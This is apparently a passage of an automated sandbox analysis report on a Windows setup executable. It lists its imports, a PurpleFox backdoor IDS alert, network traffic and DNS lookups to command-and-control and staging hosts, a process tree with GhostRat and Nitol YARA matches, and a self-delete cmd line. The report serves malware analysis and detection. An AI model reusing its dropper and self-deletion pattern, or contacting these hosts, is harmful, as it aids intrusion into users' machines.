                                                              KERNEL32.dllExitProcess, GetTickCount, GetCommandLineA, InterlockedIncrement, CloseHandle, InterlockedDecrement, LocalFree, WaitForSingleObject, MulDiv, GetProcAddress, GetModuleHandleA, GetVolumeInformationA, SetCurrentDirectoryA, CreateDirectoryA, DeleteFileA, SuspendThread, ReleaseMutex, CreateMutexA, GetLocalTime, DuplicateHandle, GetFileType, GetFileSize, SetFilePointer, FileTimeToLocalFileTime, lstrcpynA, lstrcmpiA, lstrcmpA, SetLastError, GetTimeZoneInformation, FileTimeToSystemTime, GetCurrentProcess, TerminateThread, CreateSemaphoreA, ResumeThread, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, GetProfileStringA, IsBadCodePtr, IsBadReadPtr, CompareStringW, CompareStringA, SetUnhandledExceptionFilter, GetStringTypeW, GetStringTypeA, IsBadWritePtr, VirtualAlloc, LCMapStringW, LCMapStringA, SetEnvironmentVariableA, VirtualFree, HeapCreate, HeapDestroy, GetEnvironmentVariableA, GetStdHandle, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, SetStdHandle, GetACP, HeapSize, TerminateProcess, RaiseException, GetSystemTime, RtlUnwind, WriteFile, WaitForMultipleObjects, CreateFileA, SetEvent, FindResourceA, LoadResource, LockResource, ReadFile, RemoveDirectoryA, GetModuleFileNameA, WideCharToMultiByte, MultiByteToWideChar, GetCurrentThreadId, FlushFileBuffers, GlobalSize, GlobalFree, DeleteCriticalSection, InitializeCriticalSection, lstrcatA, lstrlenA, WinExec, lstrcpyA, FindNextFileA, GlobalReAlloc, HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetFullPathNameA, FreeLibrary, LoadLibraryA, GetLastError, GetVersionExA, WritePrivateProfileStringA, CreateThread, CreateEventA, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, FindFirstFileA, FindClose, SetFileAttributesA, GetFileAttributesA, GetStartupInfoA, GetOEMCP, GetCPInfo, GetProcessVersion, SetErrorMode, GlobalFlags, GetCurrentThread, GetFileTime, TlsGetValue, LocalReAlloc, TlsSetValue, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetVersion, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, SetEndOfFile, UnlockFile, LockFile
                                                              USER32.dllDrawTextA, wsprintfA, CloseClipboard, GetClipboardData, OpenClipboard, SetClipboardData, EmptyClipboard, GetSystemMetrics, GetCursorPos, MessageBoxA, SetWindowPos, SendMessageA, DestroyCursor, SetParent, IsWindow, PostMessageA, GetTopWindow, GetParent, GetFocus, GetClientRect, InvalidateRect, ValidateRect, UpdateWindow, EqualRect, GetWindowRect, SetForegroundWindow, DestroyMenu, IsChild, ReleaseDC, IsRectEmpty, FillRect, GetDC, SetCursor, LoadCursorA, SetCursorPos, SetActiveWindow, GetSysColor, SetWindowLongA, GetWindowLongA, RedrawWindow, EnableWindow, IsWindowVisible, OffsetRect, PtInRect, DestroyIcon, IntersectRect, InflateRect, SetRect, SetScrollPos, SetScrollRange, GetScrollRange, SetCapture, GetCapture, ReleaseCapture, SetTimer, KillTimer, WinHelpA, LoadBitmapA, CopyRect, ChildWindowFromPointEx, ScreenToClient, GetMessagePos, SetWindowRgn, DestroyAcceleratorTable, GetWindow, GetActiveWindow, SetFocus, IsIconic, PeekMessageA, GetSysColorBrush, LoadStringA, GetDesktopWindow, GetClassNameA, GetMenuCheckMarkDimensions, GetMenuState, SetMenuItemBitmaps, CheckMenuItem, MoveWindow, IsDialogMessageA, ScrollWindowEx, SendDlgItemMessageA, MapWindowPoints, AdjustWindowRectEx, CharUpperA, SetWindowTextA, GetForegroundWindow, LoadIconA, TranslateMessage, DrawFrameControl, DrawEdge, DrawFocusRect, WindowFromPoint, GetMessageA, DispatchMessageA, SetRectEmpty, RegisterClipboardFormatA, CreateIconFromResourceEx, CreateIconFromResource, DrawIconEx, CreatePopupMenu, AppendMenuA, ModifyMenuA, CreateMenu, CreateAcceleratorTableA, GetDlgCtrlID, GetSubMenu, EnableMenuItem, ClientToScreen, EnumDisplaySettingsA, LoadImageA, SystemParametersInfoA, ShowWindow, IsWindowEnabled, TranslateAcceleratorA, GetKeyState, CopyAcceleratorTableA, PostQuitMessage, IsZoomed, GetClassInfoA, DefWindowProcA, GetSystemMenu, DeleteMenu, GetMenu, SetMenu, GetWindowTextA, GetWindowTextLengthA, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, UnregisterClassA, GrayStringA, GetDlgItem, DestroyWindow, CreateDialogIndirectParamA, EndDialog, GetNextDlgTabItem, GetWindowPlacement, RegisterWindowMessageA, GetLastActivePopup, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, GetMenuItemID, GetMenuItemCount, RegisterClassA, GetScrollPos
                                                              GDI32.dllSetStretchBltMode, GetClipRgn, CreatePolygonRgn, SelectClipRgn, DeleteObject, CreateDIBitmap, GetSystemPaletteEntries, CreatePalette, StretchBlt, SelectPalette, RealizePalette, GetDIBits, GetWindowExtEx, GetViewportOrgEx, GetWindowOrgEx, BeginPath, EndPath, PathToRegion, CreateEllipticRgn, CreateRoundRectRgn, GetTextColor, GetBkMode, GetBkColor, GetROP2, GetStretchBltMode, GetPolyFillMode, CreateCompatibleBitmap, CreateDCA, CreateBitmap, SelectObject, GetObjectA, CreatePen, PatBlt, CombineRgn, CreateRectRgn, FillRgn, CreateSolidBrush, GetStockObject, CreateFontIndirectA, EndPage, CreateRectRgnIndirect, DeleteDC, StartDocA, StartPage, BitBlt, CreateCompatibleDC, Ellipse, Rectangle, LPtoDP, DPtoLP, GetCurrentObject, RoundRect, GetTextExtentPoint32A, GetDeviceCaps, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetTextColor, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, ExcludeClipRect, MoveToEx, LineTo, ExtSelectClipRgn, GetViewportExtEx, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetTextMetricsA, SetBkColor, EndDoc
                                                              WINMM.dllwaveOutRestart, waveOutUnprepareHeader, waveOutPrepareHeader, waveOutWrite, waveOutPause, waveOutReset, waveOutClose, waveOutGetNumDevs, waveOutOpen, midiOutUnprepareHeader, midiStreamOpen, midiStreamProperty, midiOutPrepareHeader, midiStreamOut, midiStreamStop, midiOutReset, midiStreamClose, midiStreamRestart
                                                              WINSPOOL.DRVDocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                              ADVAPI32.dllRegCreateKeyExA, RegCloseKey, RegOpenKeyExA, RegSetValueExA, RegQueryValueA
                                                              SHELL32.dllShell_NotifyIconA, ShellExecuteA
                                                              ole32.dllCLSIDFromString, OleUninitialize, OleInitialize
                                                              OLEAUT32.dllLoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
                                                              COMCTL32.dllImageList_Destroy
                                                              WS2_32.dllioctlsocket, inet_ntoa, ntohl, accept, getpeername, WSAStartup, WSACleanup, select, send, closesocket, WSAAsyncSelect, recv, recvfrom
                                                              WININET.dllInternetReadFile, HttpQueryInfoA, HttpSendRequestA, HttpOpenRequestA, InternetCrackUrlA, InternetCanonicalizeUrlA, InternetOpenA, InternetCloseHandle, InternetSetOptionA, InternetConnectA
                                                              comdlg32.dllGetFileTitleA, GetSaveFileNameA, GetOpenFileNameA, ChooseColorA

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              ChineseChina

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              03/14/24-08:46:09.383883TCP2851179ETPRO TROJAN PurpleFox Backdoor/Rootkit Checkin M2497018000192.168.2.6154.91.65.2

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 14, 2024 08:45:58.445348024 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:58.445389032 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:58.445451021 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:58.463654995 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:58.463674068 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.391782999 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.391864061 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.392712116 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.392887115 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.503443956 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.503465891 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.503701925 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.503916025 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.509421110 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.552248955 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.858428001 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.858470917 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:45:59.858503103 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.858531952 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.859396935 CET49699443192.168.2.682.156.94.17
                                                              Mar 14, 2024 08:45:59.859419107 CET4434969982.156.94.17192.168.2.6
                                                              Mar 14, 2024 08:46:04.347925901 CET4970080192.168.2.6103.7.30.83
                                                              Mar 14, 2024 08:46:05.362643957 CET4970080192.168.2.6103.7.30.83
                                                              Mar 14, 2024 08:46:07.362539053 CET4970080192.168.2.6103.7.30.83
                                                              Mar 14, 2024 08:46:08.633974075 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:46:08.931978941 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:46:08.932122946 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:46:09.383882999 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:46:09.743040085 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:46:11.362602949 CET4970080192.168.2.6103.7.30.83
                                                              Mar 14, 2024 08:46:19.362477064 CET4970080192.168.2.6103.7.30.83
                                                              Mar 14, 2024 08:46:24.680804014 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:46:24.680886030 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:46:39.977462053 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:46:39.977530003 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:46:55.289813042 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:46:55.289906979 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:47:10.603365898 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:47:10.603478909 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:47:25.902530909 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:47:25.902734041 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:47:41.212723017 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:47:41.212812901 CET497018000192.168.2.6154.91.65.2
                                                              Mar 14, 2024 08:47:56.509466887 CET800049701154.91.65.2192.168.2.6
                                                              Mar 14, 2024 08:47:56.509567976 CET497018000192.168.2.6154.91.65.2

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Mar 14, 2024 08:45:58.195528984 CET5751153192.168.2.61.1.1.1
                                                              Mar 14, 2024 08:45:58.421515942 CET53575111.1.1.1192.168.2.6
                                                              Mar 14, 2024 08:46:01.448816061 CET5721553192.168.2.61.1.1.1
                                                              Mar 14, 2024 08:46:02.158771038 CET53572151.1.1.1192.168.2.6
                                                              Mar 14, 2024 08:46:02.163882017 CET6312953192.168.2.61.1.1.1
                                                              Mar 14, 2024 08:46:03.159540892 CET6312953192.168.2.61.1.1.1
                                                              Mar 14, 2024 08:46:03.563026905 CET53631291.1.1.1192.168.2.6
                                                              Mar 14, 2024 08:46:03.563163042 CET53631291.1.1.1192.168.2.6
                                                              Mar 14, 2024 08:46:03.564718962 CET572168000192.168.2.6103.7.30.61
                                                              Mar 14, 2024 08:46:03.578248978 CET4960953192.168.2.61.1.1.1
                                                              Mar 14, 2024 08:46:04.231270075 CET53496091.1.1.1192.168.2.6
                                                              Mar 14, 2024 08:46:25.425710917 CET631308000192.168.2.6103.7.30.83

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 14, 2024 08:45:58.195528984 CET192.168.2.61.1.1.10x148bStandard query (0)chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.comA (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:01.448816061 CET192.168.2.61.1.1.10x8b0fStandard query (0)ied-tqos.wegamex.com.hkA (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:02.163882017 CET192.168.2.61.1.1.10x8f14Standard query (0)tqos.wegamex.com.hkA (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:03.159540892 CET192.168.2.61.1.1.10x8f14Standard query (0)tqos.wegamex.com.hkA (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:03.578248978 CET192.168.2.61.1.1.10xcfb3Standard query (0)tqos.wegamex.com.hkA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.combj.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)bj.file.myqcloud.com82.156.94.17A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)bj.file.myqcloud.com82.156.94.45A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)bj.file.myqcloud.com82.156.94.47A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)bj.file.myqcloud.com82.156.94.48A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:45:58.421515942 CET1.1.1.1192.168.2.60x148bNo error (0)bj.file.myqcloud.com82.156.94.13A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:02.158771038 CET1.1.1.1192.168.2.60x8b0fNo error (0)ied-tqos.wegamex.com.hk103.7.30.61A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:03.563026905 CET1.1.1.1192.168.2.60x8f14No error (0)tqos.wegamex.com.hk103.7.30.83A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:03.563163042 CET1.1.1.1192.168.2.60x8f14No error (0)tqos.wegamex.com.hk103.7.30.83A (IP address)IN (0x0001)false
                                                              Mar 14, 2024 08:46:04.231270075 CET1.1.1.1192.168.2.60xcfb3No error (0)tqos.wegamex.com.hk103.7.30.83A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.64969982.156.94.174435224C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-03-14 07:45:59 UTC196OUTGET /guofucheng.txt HTTP/1.1
                                                              Accept: */*
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                              Host: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
                                                              Cache-Control: no-cache
                                                              2024-03-14 07:45:59 UTC420INHTTP/1.1 200 OK
                                                              Content-Type: text/plain
                                                              Content-Length: 5
                                                              Connection: close
                                                              Accept-Ranges: bytes
                                                              Content-Disposition: attachment
                                                              Date: Thu, 14 Mar 2024 07:45:59 GMT
                                                              ETag: "6412121cbb2dc2cb9e460cfee7046be2"
                                                              Last-Modified: Mon, 11 Mar 2024 16:16:14 GMT
                                                              Server: tencent-cos
                                                              x-cos-force-download: true
                                                              x-cos-hash-crc64ecma: 12795711674566584174
                                                              x-cos-request-id: NjVmMmFiMzdfYTNlYzIzMGJfMjljNzFfMTI0MWQwZGQ=
                                                              2024-03-14 07:45:59 UTC5INData Raw: 31 30 30 38 36
                                                              Data Ascii: 10086


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:08:45:55
                                                              Start date:14/03/2024
                                                              Path:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              Imagebase:0x400000
                                                              File size:24'674'304 bytes
                                                              MD5 hash:0B69B1391C949736C21FF137D4183B28
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:08:45:59
                                                              Start date:14/03/2024
                                                              Path:C:\Users\Wegame\Wegame.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\users\Wegame\Wegame.exe"
                                                              Imagebase:0x400000
                                                              File size:1'467'272 bytes
                                                              MD5 hash:6B54CAC74E2C36E9A34563018CE99AEA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:4
                                                              Start time:08:46:04
                                                              Start date:14/03/2024
                                                              Path:C:\Users\Statr\kill.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\users\Statr\kill.exe"
                                                              Imagebase:0x3b0000
                                                              File size:15'968 bytes
                                                              MD5 hash:D94C31E9C9C9A1273CC67DC6FFAF9984
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 3%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:08:46:04
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:08:46:07
                                                              Start date:14/03/2024
                                                              Path:C:\ProgramData\RuntimeBroker.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\RuntimeBroker.exe"
                                                              Imagebase:0x570000
                                                              File size:848'200 bytes
                                                              MD5 hash:67EE3B7CA47FEC435EAB6DDE7AAEDCF7
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:8
                                                              Start time:08:46:12
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                                                              Imagebase:0x1c0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:08:46:12
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00406649 Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2244309235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000D9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000DA3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000015BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B05000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B59000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B6D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B95000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246181597.0000000001BB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_setup#U67e5#U8be2_pf2024.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d15299dc2022adb2b2db0ad74ad79715b3db66659a3374db52785553096d272f
                                                                • Instruction ID: 971a33f4b3793d3a992831974d9f883ed70187b4b9574942d35ba496b37a2f96
                                                                • Opcode Fuzzy Hash: d15299dc2022adb2b2db0ad74ad79715b3db66659a3374db52785553096d272f
                                                                • Instruction Fuzzy Hash: E7A0228320E020208020302B3C88CCB8F2CCCC223A000003BF00000002002C0082C0B0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040528E Relevance: .0, Instructions: 8COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2244326748.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2244309235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000049E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000D9D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000000DA3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.000000000149F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000014E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.00000000015BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B05000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2244374973.0000000001B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2246072290.0000000001B43000.00000004.00000001.01000000.00000003.sdmpDownload File
